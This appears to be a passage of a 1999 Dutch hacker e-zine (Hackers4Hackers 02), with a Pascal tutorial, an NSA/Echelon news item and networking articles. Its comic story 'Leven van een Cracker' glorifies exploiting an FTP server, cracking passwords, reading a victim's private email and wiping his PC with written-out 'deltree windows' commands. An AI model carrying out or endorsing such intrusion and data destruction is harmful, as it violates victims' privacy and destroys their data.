___ ___ _____ ___ ___ / | \ / | | / | \ / ~ \/ | |_/ ~ \ \ Y / ^ /\ Y / \___|_ /\____ | \___|_ / \/ |__| \/ +-+-+-+-+-+-+-+ +-+ +-+-+-+-+-+-+-+-+-+-+ |h|a|c|k|e|r|s| |4| |h|a|c|k|e|r|s| |0|2| +-+-+-+-+-+-+-+ +-+ +-+-+-+-+-+-+-+-+-+-+ http://www.hackers4hackers.org '12-06-1999' Om je aan te melden bij de maillijst kan je een mailtje sturen naar subscribe@hackers4hackers.org met als titel "subscribe h4h emailadres" Of je kan je online aanmelden op http://www.hackers4hackers.org Artikelen en dergelijke kun je mailen naar post@hackers4hackers.org Vragen kun je mailen naar de desbetreffende auteur of ook naar post@hackers4hackers.org Enkele interessante sites: http://www.dutchthreat.org http://security.pine.nl http://www.hit2000.org 01. Disclaimer....................................... (Redaktie) 02. Inleiding........................................ (Redaktie) 03. Leven van een Cracker dag 1...................... (drgenius) 04. Stukje NRC: Rapport over NSA..................... (Redaktie) 05. Programmeren in Pascal........................... (RaViTy) 06. Evenementen...................................... (Redaktie) 07. Aanvulling stukje Ethernet....................... (Skin Quad) 08. Hoge snelheids IP netwerken...................... (Maniac) 09. NFS server scan.................................. (Gerrie) 10. Carding.......................................... (Avatar) 11. Aanvulling Cold Fusion.......................... (Asby) 12. Ditjes en Datjes................................. (Asby) --------------- 01. Disclaimer --------------- We zijn niet verantwoordelijk voor datgene wat jullie met deze informatie doen. Deze informatie dient alleen voor educationele doeleinden. Als je in problemen komt, kan je ons niks verwijten. Gebruik maken van deze informatie kan strafbaar zijn. Meningen van auteurs hoeven niet hetzelfde te zijn als die van de redactie. -------------- 02. Inleiding -------------- Eindelijk, na veel werk was H4H-01 klaar. Effe rust voor de redactie, maar nee, het commentaar stroomde al binnen. Men vond H4H geen goed beeld geven over hackers. Hiermee werd vooral het deel bedoeld over virussen maken en formateren van harde schijven. Dit heeft inderdaad niets met hackers te maken. Vooral Gerrie, bekend van Hit2000 kreeg veel klachten binnen, omdat men dacht dat H4H bij HIT2000 hoorde. Dit is dus echter niet het geval. H4H staat los van HIT2000, althans nu. Wil men in de toekomst commentaar leveren (dan kunnen we er wat mee doen) surf dan naar onze website (http://www.hackers4hackers.org) en vul uw commentaar in bij de commentaar-pagina. Als er mensen zijn die een artikel willen schrijven of graag een artikel over een bepaald onderwerp willen zien, kan dat op dezelfde pagina. Tevens kan men hier ditjes en datjes opgeven. We kunnen H4H niet maken zonder uw hulp. Dus als je denkt dat je over een bepaald technisch onderwerp een leuk artikel kan schrijven schaam je dan niet om dit te doen en op te sturen naar H4H (post@hackers4hackers.org) De redactie bedankt iedereen voor het meewerken aan H4H. De redactie --------------------------------- 03. Leven van een Cracker, dag 1 --------------------------------- De cracker: dag 1 Volledig geisoleerd zit de cracker vol verwachting te scannen, verstomd, zonder enige notie van audio-input, afgesloten van de rest van de wereld, en het lukt. Kijk....... schrik.... adrenaline-verhoging..... en JA .... beta 18 YES :-). Kippevel omringt zijn lichaam. Snel runt de cracker home-made-progd scripts die een ware lust voor het oog zijn voor newbies.. het lukt.... shaggies beginnen untouched op te branden, bier is niet meer belangrijk en msg's zijn irritant... De cracker wordt 1 met zijn keyboard, naar de WC gaan is een irritante noodzaak, eten wordt een op maximaal aantal kaakbewegingen per seconde gebaseerde methode. Shaggies verstrijken Dan gebeurt het..... WoW, stoer, vet, bruut vindt de cracker, gedachtes spelen door zijn c-geinfecteerde hersenen, hij zou natuurlijk dit scriptje kunnen uitvoeren... eerst ff bier pakken... en iets te kanen, chips ofzow. Al chips-etend, shaggie draaiend en bier zuipend tracht de cracker een lamer op IRC te dumpen, een met xxx passes gevulde john-sessie bij te houden, ICQ messages te replyen, zijn nieuwe HPCV site bij te houden en dat terwijl de beta 18 bug hem met zachtsmekende woordjes roept. Stress... bloeddrukverhoging..... de cracker besluit alles behalve FTP te sluiten. Met een aan zekerheid grenzende waarschijnlijkheid heeft de cracker nu sanitaire behoeftes binnen nu en the actual hack dus hij besluit maar vast naar de WC te gaan... Aaahhhhh enz... Beterz. De cracker vangt tijdens het teruglopen naar pc audioinput op van zijn ouders als: "stop je er zo mee?" Wetend nog zeker 20 minuten nodig hebbend antwoord de cracker: "ja ma, nog 5 minuten". De cracker snelt terug naar zijn bak na de uit voorzorg genomen sanitaire stop en voert het wu_ftpbug_exploit_script uit. ??????'s verschijnen op het scherm, de cracker denkt: beterz. De cracker voert ff get uit en ript de passwd-file, daarna voert hij ff john uit en hij heeft weer een paar sites om te defacen. Alles goed denkt de cracker.... Maarja de cracker heeft het via certain provider gedaan... Das pech, account weg, maargoed lekker belangrijk ...........tring........tring........ telefoon. Zweetdruppels verschijnen op het voorhoofd van de cracker als de naam van de provider klinkt waarvandaan de cracker de vele sites heeft gedefaced. "Hallo..." ",Ja goedendag met lame internet BV" klinkt het. Shit denkt de cracker, al zijn social engineering ervaring bij elkaar aan het rapend zegt hij: "godver alweer zo'n irritant telefonisch verkoopbedrijf, kunnen jullie me niet eens met rust laten ?" "Ik koop niet via de telefoon" weet de cracker er nog uit te persen. Het antwoord van de ISP luid vervolgens ongeveer zo : "Nou we willen u even erop wijzen dat......", "Oja dat zijn jullie, nou mooi dat ik jullie spreek, ROT OP" schreeuwt de cracker, "ik kreeg vorige keer ook al irritante email van jullie, zo van: u dient te stoppen met de attacks. Godver mijn account is gehackt, allemaal vage computerinbrekers die mijn email kunnen lezen en dat mij ook nog vertellen ook. Kunnen jullie er niet voor zorgen dat DAT niet kan gebeuren, stomme idioten, sterker nog ik zeg mijn account op bij deze, en nix schriftelijk en als jullie me nog eens opbellen / emailen klaag ik jullie aan wegens schending van mijn prive-rechten want dat is tenslotte al gebeurd door computerinbrekers die mijn email lezen omdat jullie er een achterlijke manier van configureren op na houden, en als u mij wilt excuseren ik ben ff druk bezig met mijn vriendin te bevredigen, wat mij al 3 maanden niet meer is gelukt, so if you don't mind" tuut.. tuut.. tuut.. Zich intern doodlachend ziet de cracker dat zijn bier op is... ff biertje pakken...... of beter, de hele krat naast zich neer zetten. Al piekerend realiseerd de cracker zich dat hij nog weed heeft, beterz.... blowtje draaien...... shit tippies op, dan maar weer kaftje van cd molesteren. Na kwartiertje zoeken in de puinhopen in zijn kamer (bierblikjes, rondslingerende cd's, 10 miljoen rondslingerende notitiebriefjes met vage IP nummers en ranges, diverse emails en andere onzin plus een zootje lege afgekauwde pennen) vind hij eindelijk het doel: het cd kaftje waarmee hij tippie kan draaien. Beterz, blowen..... ff sepultura cd rehashen want die was al 3 uur gestopt terwijl de crackers' koptelefoon nog altijd op zijn hoofd zit zonder geluid te produceren. Beterz muziek....... nou toch maar nog ff wat hacken vind de cracker. Hmmzzzz wat zullen we nou s proberen, tiepend op de maat van de muziek besluit de cracker maar ff wat shares te mappen van lame kutprovider die net belde, alijd handig die dialups denkt de cracker bij zichzelf...... hmzzzz..... gelukt..... ff kijken wat deze dude op zijn pc heeft staan. Dir en type achtige commando's razen over het beeldscherm. grappig een mirc.ini...... ff geintje uithalen denkt de cracker. Hmmmzzz grappig, hij gebruikt zelfde irc server als ik, ff auto-oppie toevoegen in mirc.ini..... hehe beterz ga ik nu ff chatten denkt de cracker, ff grappie uithalen. Na een whois heeft de hacker de lamer op dcc-chat, hehe beterz.. "Ik zit in je pc :)", "jaja, tuurlijk" klinkt de respons, "JA" zegt de cracker, "geloof je me niet ?", "natuurlijk niet" klinkt het antwoord. "Hmmzzzz ok" zegt de cracker "ff kijken, je hebt net email gehad van je zus, die is zwanger van de groenteboer en haar vriend die werkeloos is en haar slaat mag het niet weten :)", "hehe das toeval dat je dat zegt" zegt de lamer. "eikel" zegt de cracker, "je inbel passwoord is droplul, je hebt gister 3 uur lang geinternet, je hebt www.animalsex.com bekeken en je belastingaangife bedroeg Fl 25.849,- geloof je me nu?", "nee dat kan iedereen zeggen" zegt de lamer. "Nou moet je kappen" zegt de cracker "anders delete ik gewoon alles, geloof je me dan?", "ja dan geloof ik je wel" zegt de lamer. *grin* "ok" attrib -r -h *.*, del. , deltree windows, deltree progra~1, deltree mijndo~1 .... zo uitgespeeld voor vandaag denkt de cracker. PLOP! uit die pc, morgen weer verder spelen. Dit was dag 1 uit het leven van de cracker, meer zullen volgen -=8-) drgenius --------------------------------- 04. Stukje NRC: Rapport over NSA --------------------------------- Rapport over NSA: Gebruikers Internet bespioneerd Door onze redacteur MARIE-JOSÉ KLAVER ROTTERDAM, 2 JUNI. De Amerikaanseinlichtingendienst National Security Agency NSA) bespioneert Internetgebruikers en bedrijven via veelgebruikte computerprogramma's als Lotus Notes en de browsers Explorer en Netscape. Ook heeft de NSA directe toegang tot negen centrale punten in de transat- lantische Internetverbindingen om datacommunicatie af te luisteren. Dit staat in een nieuw rapport van de wetenschappelijke werkgroep van het Europees Parlement, het Science and Technology Options Assessment. In het rapport, getiteld Development of surveillance technology. Interception capabilities 2000, wordt aan de hand van voorbeelden en uitgelekte ver- trouwelijke informatie een gedetailleerd beeld geschetst van het aftapnet- werk van de NSA, dat onder de codenaam Echelon bekend staat. Een eerder rapport over het stelselmatig aftappen van Europees telefoon-, fax- en e-mailverkeer zorgde vorig jaar voor veel opschudding in de Euro- pese Unie. Het Europees Parlement keurde de afluisterpraktijken in een re- solutie af. Op grond van openbare bronnen en gesprekken met ex-medewerkers van de NSA en de Britse geheime dienst GCHQ onthult de werkgroep met wat voor tech- nische middelen de Amerikaanse inlichtingendienst alle Europese datacom- municatie onderschept en afluistert. Behalve over een uitgebreid satelliet- netwerk met grondstations in de VS, Groot-Brittannië en Australië, beschikt de NSA ook over directe toegang tot de backbone (ruggengraat) van grote Internetbedrijven en telecomoperators als Pacific Bell en MCI. Volgens Wayne Madsen, een voormalige spion van de NSA, heeft de geheime dienst al sinds 1995 op centrale punten in het Internet zogeheten sniffers geïnstal- leerd om e-mail en ander Internetverkeer af te tappen. Met behulp van digi- tale woordenboeken en slimme zoekprogramma's worden de onderschepte be- richten gescand op trefwoorden. Uit de publiek toegankelijke patentendatabank van softwaregigant IBM blijkt dat de NSA sinds 1993 twintig patenten heeft aangevraagd voor speciale high tech afluisterapparatuur, zoekfilters en versleutelingsprogramma's. Zo heeft de inlichtingendienst in 1995 een patent gekregen voor een speciale methode om berichten over hetzelfde thema te onderscheppen en in een databank op te slaan, 'topic spotting' geheten. Volgens het rapport wordt 'topic spotting' door de NSA gebruikt om profielen aan te leggen van mensen en bedrijven die over bepaalde onderwerpencommuniceren. 'Topic spotting' zal op den duur het selecteren op enkele trefwoorden ver- vangen, zo wordt voorspeld in Development of surveillance technology. --------------------------- 05. Programmeren in Pascal --------------------------- 01-05-1999 XxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxX x Programmeren in het algemeen x XxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxX = - Door RaViTy van HaVeN. - = =- Hehe, als je al een goede coder bent mag je deze tutorials overslaan. 1. Introductie 2. Basisbeginselen 1. Introductie In deze tutor behandelen we de mooiste programmeertaal aller tijden: Pascal. Het handige van pascal is dat je er gemakkelijk assembler mee linkt, en er is de mogelijkheid inline assembler te gebruiken. Er zijn vele versies van pascal compilers verkrijgbaar: Turbo Pascal, Borland Pascal, TMT etc. Alle voorbeelden in deze tutorial zijn getest met Turbo Pascal 7.0 en Borland Pascal 7.0. Voor grote demo's wordt meestal c++ gebruikt, omdat de compiler iets krachtiger is dan die van pascal, maar in 4k demo's wordt pascal nog vaak gebruikt, omdat de compiler van pascal zeer kleine files maakt. Verder zijn er veel mensen die denken dat alleen c++ Object Oriented Programming OOP ondersteunt, maar dat is onzin. Bijna alle talen kunnen dat, en natuurlijk is pascal geen uitzondering op deze regel. Borland Pascal is net iets uitgebreider dan Turbo Pascal. Deze versie ondersteunt windows compiling, en protected mode. 2. Basisbeginselen Start TURBO.EXE, BP.EXE of als je een compiler hebt zonder IDE (Integrated Development Iveronment), zo'n ingebouwde editor, dan kun je ook kladblok voor windows of de doseditor gebruiken. Ok, we beginnen met een makkelijk programmatje dat een regel op het scherm zet: (Typ de " " niet over) "program hallo;" << Let op de [;]! " " << open regel (Hoeft niet perse) "var MijnNaam:string;" "begin" "writeln('Hallo, Hoe heet jij?');" << Let op de [']! "writeln;" "write('--> ');" "readln(MijnNaam);" << Wacht op een input "writeln('Hallo, mijn naam is ',MijnNaam);" "readln;" "end." << Let op de [.]! Ok, als je het nog niet snapt leg ik alles even uit. -program: Elk programma begint hiermee, je kunt bijna alles als programma naam bedenken. Zie de lijst van gereserveerde woorden onderaan in deze tutor, die mag je niet gebruiken omdat de compiler dan in de war raakt. Zet dit altijd helemaal bovenaan in je programma. Het is niet perse nodig om program te gebruiken, maar het is wel handig zodra je met units gaat werken, zodat er een overzicht blijft. -var: Hier kun je variabelen declareren. Dit klinkt misschien moei- lijk, dus zal ik proberen het iets eenvoudiger te maken. Je kunt je een variabele voorstellen als een lege doos, waar je iets in wilt doen. Als je meerdere variabelen, dus dozen, wilt hebben zet je met een dikke stift op elke doos wat er straks in moet komen te zitten. Dit kan een regel zijn, of een getal, er zijn teveel mogelijkheden om op te noemen. Je zet er ook een naam op, zodat je later kan zien in welke doos je de regel of het getal moet stoppen. Dus als er staat: Var MijnNaam:String; wil dat zeggen: een variabele (doos) met de naam MijnNaam, is bedoeld om een regel (string) of lijn tekst in te stoppen. Nog een voorbeeld: Var Hoeveelheid:Integer; dit wil zeggen: een variabele met de naam Hoeveelheid, is bedoeld om een geheel getal (integer) in te stoppen. Als je het nog niet snapt is het niet erg, misschien snap je het wel als we iets in de variabele hebben gestopt. Dat zie je zo. -begin: Dit geeft aan dat vanaf hier alle statementen komen. Bij assembler zou dit het CODE segment zijn ( .CODE). Hier is al vast het eerste verschil tussen batch en pascal, er zijn aparte segmenten. Je hebt een data en een code segment. Het data segment is het gedeelte waar de variabelen, constanten (waar we het later nog over gaan hebben) en typen (ook later) gedeclareerd worden. Het code segment is het gedeelte na BEGIN, waar alle commando's worden gegeven. -writeln: Writeln (lees: write line >> Schrijf een regel) laat een regel op het scherm verschijnen. Je kunt writeln op twee manie- ren gebruiken: 1. Writeln('Hallo'); >> Als je het programma draait zie je daadwerkelijk hallo op je scherm. 2. Writeln(Hallo); >> De compiler zoekt nu naar een variabele met de naam Hallo en geeft die weer op het scherm. Er moet wel eerst iets aan de variabele toegekend worden. 3. Writeln; >> Een regel overslaan. ** Na een writeln verplaatst de cursor altijd naar de volgende regel ** (Als je van de variabelen nog niks snapt, lees dan gewoon nog even door. Als je aan het einde van deze tutor het nog niet snapt moet je alles nog eens rustig doornemen.) Kijk eens even naar deze regel: Writeln('Hallo, mijn naam is ',MijnNaam); Als je bij readln "Al Bundy" hebt ingevoerd, zie je bij de uitvoer: "Hallo, mijn naam is Al Bundy" Hier werden dus de eerste twee manieren van het gebruik van writeln gecombineerd. Zowel de directe als de variabele manier. -write: Werkt hetzelfde als writeln, maar de cursor blijft aan het einde van deze regel, en gaat dus niet naar de volgende regel. -readln: Readln (lees: Read line >> Lees regel) is een commando dat wacht op een invoer. Voorbeeld: Readln(MijnNaam); Het programma stopt hier even en wacht op een invoer. Deze invoer wordt opgesla- gen in de variabele die tussen haakjes staat. Stel de invoer was "Al Bundy", dan slaat de compi- ler de regel "Al Bundy" op in de variabele (doos) met de naam MijnNaam. (Als je nu nog niks snapt van de variabelen moet je even alles rustig overnieuw lezen.) Readln; (dus zonder variabele) betekent gewoon dat de compiler wacht op een invoer, of gewoon ENTER, maar niet op- slaat in een variabele. -end: End geeft aan dat dit het einde is. Het einde van het code segment dus. (Er komt niks meer na het code-segment) Let op de [.] Gebruik "END." helemaal aan het einde. "END." is dus altijd je laatste regel. Later zullen we procedures behan- delen, die beginnen ook met "begin" maar eindigen met "end;", dus zonder punt. De compiler weet dan dat dat niet het echte einde is, maar het einde van een procedure. Lijst van gereserveerde woorden: Absolute Div For Interface Of Set And Do Forward Interrupt Or Shl Array Downto Function Label Packed Shr Asm Else Goto Library Private String Assembler End If Mod Procedure Then Begin Export Implementation Name Program To Case Exports In Near Public Type Const External Index Nil Record Unit Constructor Far Inherited Not Repeat Until Destructor File Inline Object Resident Uses nog een paar: Var Virtual While With Xor Dit is het einde van deel 2. Volgende keer maken we een rekenmachine, en leer je meer van de mogelijkheden van Pascal. Yours Truly, RaViTy ---------------- 06. Evenementen ---------------- H4H zoekt nog steeds mensen die naar een of andere meeting is geweest waar technische zaken werden besproken en hier misschien een leuk verhaaltje over willen schrijven. Evenementen voor de komende twee maanden: Inleiding Cryptografie door Interprom Binnen de cursus komen de volgende onderwerpen voor: Basisconcepten, Symmetrische systemen, Asymmetrische systemen, Authenticatie en integriteit, Sleutelbeheer en netwerkbeveiliging. Datum: 16-06-1999 Lokatie: Onbekend, NL www.interprom.nl/Nederlands/training/Cursusbeschrijving/iss02.htm The Black Hat Briefings '99 The Black Hat Briefings is een jaarlijks security congres. Belangrijkste onderwerpen van het 2-daagse congres zijn dit jaar onder andere: inbraakdetectiesystemen, incident repons, zwakheids analyse, veilige programmeer technieken, hoe analyse en monitoring tools te selecteren en aan computerbeveiliging gerelateerde beheersvraagstuken. Datum: 07-07-1999 t/m 08-07-1999 Lokatie: Las Vegas, US Homepage: http://www.blackhat.com/ DEF CON 7 DEF CON is een jaarlijks computer-underground feest voor hackers in Las Vegas. Datum: 09-07-1999 t/m 11-07-1999 Lokatie: Las Vegas, Nevada, US Homepage: http://www.defcon.org/ De redactie (Bron: http://security.pine.nl) ------------------------------- 07. Aanvulling stukje Ethernet ------------------------------- Aangezien mij het idee bekroop dat er aantal mensen graag de hacker of cracker willen uithangen maar de basics nog niet kennen heb ik dit artikel maar geschreven. Ik pretendeer zelf geen hacker/cracker te zijn (al heeft het wel mijn permanente interesse) en heb dus in principe meer kennis over cisco/routing problemen/etc dan over 'hacken'. Het fenomeen 'spoofen' (van IP of MAC adres) blijft maar terug komen in de diverse newsgroups. Hier even wat achtergrond idee'en over routering (tja, dat blijft toch me technoknobbel) en de betekenis van de MAC (Media Access Control) daarin. Iedereen heeft wel eens een traceroute gezien, bijvoorbeeld: 1 insgate.stack.nl (131.155.141.1) 0.756 ms 0.615 ms 2 rsm-lg1.tue.nl (131.155.140.3) 4.484 ms 1.46 ms 3 tue-gw.tue.nl (131.155.14.1) 1.488 ms 1.362 ms 4 AR1.Eindhoven.surf.net (145.41.177.193) 1.573 ms 1.468 ms 5 BR2.Eindhoven.surf.net (145.41.7.161) 1.444 ms 1.437 ms 6 BR7.Amsterdam.surf.net (145.41.7.198) 4.461 ms 4.487 ms 7 BR1.Amsterdam.surf.net (145.41.7.142) 4.871 ms 4.677 ms 8 go2.2001.net (193.148.15.66) 5.813 ms 5.029 ms 4.993 ms 9 car1-ams-atm5-0-0.global-one.nl (194.235.236.5) 7.044 ms 7.801 ms 10 ATM-155MB.widexs.nl (194.235.236.166) 46.057 ms 52.661 ms 11 HOSTED-BY.widexs.nl (195.61.111.194) 13.275 ms 15.59 ms Zoiets kan iedere PC gebruiker tevoorschijn toveren, onder windows msdos prompt wordt het commando 'tracert www.quad.nl' gebruikt, voor de Linux gebruikers is het gewoon 'traceroute www.quad.nl'. Afhankelijk van de provider/drukte/collisions/ICMP filtering zal er zo'n zelfde route te voorschijn komen. Als ik dus een http request doe voor www.quad.nl leggen alle pakketjes deze route af (indien er geen storingen zijn, etc). Nou een beetje meer achtergrond info: Alle routers/bridges/nics/etc hebben een MAC adres, het MAC adres 'kent' de fabrikant toe aan het stukje hardware. In principe is het MAC adres uniek voor dat stukje hardware en zal er nergens op deze aardkluit voorkomen (tenminste dat is de bedoeling). Als een PC (via NIC of modem) een tcp/ip pakketje verstuurd naar een IP adres komt het eerst aan bij de eerste hop (in dit geval insgate.stack.nl). Nu zou je natuurlijk kunnen denken dat de router even in z'n tabelletje opzoekt welke interface hij het pakketje moet doorsturen op bais van een IP adres, de realiteit is ietsje anders. Een node stuurt een pakketje naar een andere node op een ander netwerk. Het pakketje wordt pakketje wordt verstuurd op basis van het netwerk/node adres van de destination node. Echter voordat het pakketje verstuurd wordt, voegt de node het MAC layer adres van de router aan het pakket toe. Het MAC layer adres is dus een gedeelte van de data link layer. Dankzij dat MAC adres komt het pakket aan bij de router. Die router bekijkt het netwerk/node adres van de destination node. Vervolgens controleert de router of ie het pakket kan versturen of niet. Als er geen route voor de destination node bestaat zal hij het pakketje wegkieperen of gefowarded worden naar de default route. Indien de volgende hop niet de destination node is (meeste gevallen) dan zal de router de volgende hop bepalen, het MAC adres van het pakketje strippen (zijn eigen MAC adres dus) en het MAC adres van de volgende hop ervoor in de plaats neerzetten en het pakketje forwarden. Dit gaat zo door tot de een-na-laatste hop (laatste router) het pakketje kan forwarden naar het destination netwerk/node adres. Het enige constante in het pakketje is dus het destination netwerk/node adres, dat verandert dus absoluut niet. Het enige wat elke hop verandert is dus het MAC (hardware) adres. Skin Quad -------------------------------- 08. Hoge snelheids IP netwerken -------------------------------- Het aantal toepassingen dat gebaseerd is op het Internet Protocol (IP) neemt sterk toe. Via het internet kan toegang worden gekregen tot talloze diensten die op het IP zijn gebaseerd. Daarbij moet onder meer gedacht worden aan email, websurfen en het downloaden van software, maar ook aan minder bekende diensten zoals IP-telefonie. Door de sterke groei van het op IP gebaseerde teopassingen neemt de vraag naar hoge snelheid IP-netwerken toe. Aan deze vraag zal slechts in beperkte mate tegemoet gekomen kunnen worden, zolang voor het bouwen van IP-netwerken van traditionele concepten wordt uitgegaan. Nieuwe concepten voor het realiseren van hoge snelheid IP-netwerken zijn nodig. Dergelijke snelle netwerken zullen het gebruik en verdere ontwikkeling van IP-diensten veilig moeten stellen. In dit artikel wordt een overzicht gegeven van enkele ontwikkelingen zijnde, nieuwe concepten. De toenemende behoefte aan zeer snelle IP-netwerken is op een drietal oorzaken terug te voeren. Allereerst zijn er steeds meer computers op IP-netwerken aangesloten. Het aantal computers dat op IP-netwreken is aangesloten is nu ruwweg 20 miljoen. Dit aantal vertienvoudigt ongeveer elke vier jaar (voor meer internet-statistieken http://www.nw.com). Ten tweede is er sprake van een sterk toenemened aantal multimedia- toepassingen. Toepassingen voor het internet die gebruik maken van muziek, spraak en fotomateriaal zijn in opmars. Deze multimedia- toepassingen kenmerken zich door een grote hoeveelheid te transporteren informatie. Dit aanbod van 'enen' en 'nullen' is velen malen groter dan voor tekstgeoriënteerde toepassingen geldt. De ontwikkeling van multimedia-toepassingen is mede in zo'n stroomversnelling geraakt door de komst van steeds krachtigere multimedia-PC's. Als laatste is de vraag naar nieuwe, real-time interactieve IP-toepassingen toegenomen. Wat dan met name een rol speelt is de snelheid waarmee aangeboden informatiepakketjes, de zogenaamde IP- datagrammen, door een IP-netwerk kunnen worden verwerkt. Aan die ver- werkingssnelheid worden door real-time IP-toepassingen zoals 'telefonie- over-internet' en videocommunicatie stringende eisen gesteld. Om de maximale eind-eind vertraging die IP-datagrammen onderweg oplopen te beperken, is het wenselijk die informatiestroom in kleine IP-datagrmmen op te delen. Voor het vervoeren van een relatief geringe hoeveelheid te vervoeren informatie moeten dan relatief veel IP-datagrammen worden getransporteerd. We weten echter dat vanuit technisch oogpunt de doorvoersnelheid van de huidige IP-netwerken vooral beperkt wordt door het tempo waarin IP- datagrammen verwerkt kunnen worden. Wat de oorzaak is van deze beperking van deze traditionele IP-netwerken komt ook in dit artikel aan de orde. Gelaagdheid van IP-netwerken Om te begrijpen hoe de nieuwe concepten voor hoge snelheid IP-netwerken zijn opgezet, is inzicht nodig in de structuur van IP-netten. In dit artikel wordt een vereenvoudigde vierlaagse structuur voor publieke IP-netwerken gehan- teerd. Deze netwerkstuctuur zal laag voor laag worden toegelicht. DE TRANSMISSIELAAG De transmissielaag is de onderste laag van een IP-netwerkstructuur. Deze laag bestaat uit vaste verbindingen in het openbare transmissie- netwerk. Deze vaste verbindingen hebben een starre opbouw van mogelijke transmissiecapaciteiten, bestaande uit verbindingen met snelheden uit- eenlopend van 2 Mbit/s tot 2,4 Gbit/s. DE SCHAKELLAAG De schakellaag is de laag boven de transmissielaag. Als overlay-netwerk kan op de transmissielaag van vaste verbindingen een publieke schakel- laag worden gepositioneerd. In dit artikel beperken we ons tot een ATM-schakellaag. Met ATM (Asynchronus Transfer Mode) kan de capaciteit van een vaste verbinding tussen twee ATM-switches ten behoeve van ver- schillende toepassingen traploos over verschillende ATM-verbindingen worden verdeeld. Via de schakellaag kan zodoende een voor de toepassingen gewenste flexibiliteit worden gerealiseerd (capaciteit- op-verzoek), die in de transmissielaag ontbreekt. Daarnaast bestaan er ATM-verbindingen met verschillende verkeerskarakteristieken, waardoor geschiktheid ontstaat voor toepassingen die sterk uiteenlopende verkeersprofielen genereren. Kenmerkend voor ATM-netwerken is dat hoge transportsnelheden gereali- seerd kunnen worden. Het gebruik van een ATM-schakellaag als tussenlaag tussen de transmissielaag en de nog te bespreken IP-netwerklagen is overigens niet strikt noodzakelijk. Voor een aantal nieuwe concepten op het gebied van hoge snelhied IP-netwerken is de ATM-laag echter wel gewenst c.q. noodzakelijk. DE IP-NETWERKLAAG De IP-netwerklaag is als overlay-netwerk bovenop de transmissielaag en de ATM-schakellaag gepositioneerd. Traditioneel verzorgt de IP- netwerklaag een 'best-effort' transportdienst voor IP-datagrammen ten behoeve van IP-toepassingen. In het vervolg van dit artikel worden de eigenschappen van de IP-netwerklaag nader beschouwd en wordt bekeken hoe een IP-netwerk met hoge snelheid gerealiseerd kan worden. DE IP-APPLICATIELAAG De bovenste laag van de structuur is de IP-applicatielaag. In deze laag bevinden zich de op het IP-protocol gebaseerde toepassingen. Hierbij kan o.a. gedacht worden aan gegevensoverdracht via het File Transfer Protocol (FTP). Deze toepassingen kunnen bijvoorbeeld worden geïmplen- teerd door middel van IP-applicatieservers in het netwerk. Gebruikers kunnen met deze servers communiceren door in hun eindapparatuur een IP- protocol stack en IP-applicatie client-software te implementeren. De IP-applicatielaag valt overigens buiten het bereik van dit artikel. De werking van IP-netwerken IP-netwerken zijn label-geschakeld: alle informatie die via zo'n net- werk wordt verzonden, wordt eerst in stukjes verdeelt, waarna aan elk stukje informatie een label wordt toegevoegd. Aan de hand van dat label wordt de informatie door het netwerk getransporteerd. Een IP-netwerk levert een connectionless dienst. Kort samengevat komt die connection- less dienst erop neer dat de informatie die getransporteerd moet worden, in stukken (IP-datagrammen) wordt verdeeld. Aan zo'n IP-data- gram wordt vervolgens het voluit geschreven, eenduidig IP-bestemmings- adres toegevoegd. Die IP-datagrammen worden individueel en onafhan- kelijk van elkar door het IP-netwerk getransporteerd. Een IP-netwerk kent twee typen netwerkelementen: eindstations (ofwel IP-hosts) en IP-routers; kortweg hosts en routers genoemd. In de hosts draaien de gebruikerstoepassingen zoals email en WWW-toepassingen. De hosts zijn met elkaar verbonden door middle van netwerken van met elkaar communicerende routers. De hosts wisselen informatie uit door IP-datagrammen te versturen die door de routers naar de correcte bestemming moeten worden vervoerd. De belangrijkste taken die een router hiervoor dient uit te voeren zijn het creëren van route-tabellen (routering) en het doorsturen van IP-datagrammen (forwarding) ROUTERING De werking van een IP-netwerk kan worden vergeleken met de werking van het wegennetwerk. De weggebruiker wordt aan de hand van borden op kruisingen en splitsingen van wegen naar zijn plaats van besteming geleid. De verantwoordelijkheid voor de aanwezigheid en actualiteit aan de bewegwijzeringsinformatie ligt bij de ANWB. Een routeringsprotocol zorgt voor uitwisseling van bereikbaarheidinformatie tussen 'buurt- routers', dat wil zeggen de routers die rechtstreeks met elkaar ver- bonden zijn. Deze buurt-routers delen elkaar mee welke netwerken via hen bereikbaar zijn. Dit proces verloopt stapsgewijs: tijdens elke stap krijgen de routers steeds meer bereikbaarheidsinformatie over verder verwijderd liggende netwerken, net zo lang totdat elke router de informatie van alle aangesloten netwerken heeft. Beschikt de router over alle bereikbaarheidsinformatie, dan berekent een routeringsalgoritme in elke router de zogenaamde routetabel. In elke routetabel wordt elke mogelijk bestemming voor een binnenkomend IP-datagram gekoppeld aan een volgende router op weg naar de bestemming. Het uitvoeren van van het routeringsprotocol en algoritme is een cont- inu proces. Bij iedere verandering in het IP-netwerk --denk bijvoorbeeld aan een nieuwe router die wordt geplaats of aan een storing in een verbinding-- zal de bereikbaarheidsinformatie veranderen. Om correcte beslissingen over het doorsturen van IP-datagrammen te kunnen nemen, dient de route-tabel dan ook voortdurend te worden herberekend. FORWARDING Op basis van de informatie uit de routetabel die in het routeringspro- ces wordt berekend, stuurt de router een IP-datagram verder in de richting van de bestemming. Dit is het forwarding-proces. Routeren en forwarding vergen zowel een grote processing-capaciteit als een grote transmissie-capaciteit van routers. De inspanning van de routers worden in de praktijk engszins verlicht, doordat de IP-adressen hiërarchisch zijn opgebouwd. Berijkbaarheidsinformatie van verschillende routers kan hierdoor worden samengevoegd, waardoor de route-tabellen in omvang kunnen worden be- perkt. Desalniettemin bevatten route-tabellen van routers in de back- bone-netwerken van het internet momenteel zo'n 40.000 entries. Door groei in de toekomst, zal de problematiek rond het routeren en forwar- den alleen maar nijpender worden. Naast routerings- en forwardingsprocessen kunnen routers ook nog andere, optionele processen uitvoeren. We noemen hier bijvoorbeeld het controleren van toegangslijnen t.b.v. netwerkbeveiliging, het uitvoeren van verschillende bufferingsschema's t.b.v. kwaliteitsdifferentiatie en het genereren van administratieve gegevens voor het accounting- en bil- lingproces. Traditionele IP-routers Om zijn taken te kunnen uitvoeren is een IP-router opgebouwd uit drie functionele componeneten: een interfacekaart, die de fysieke koppeling naar de transportlaag tot stand brengt, een route-server, die voor elk binnenkomend IP-datagram beslist welke uitgaande interface moet worden gekozen, en een switching-device, die de IP-datagrammen vanaf het punt van binnenkomst naar de juiste uitgaande interface schakelt. Bij traditionele routers liggen de beperkingen op het gebied van for- warding voornamelijk bij de route-server. Deze is volledig in software geïmplementeerd. De keuze voor 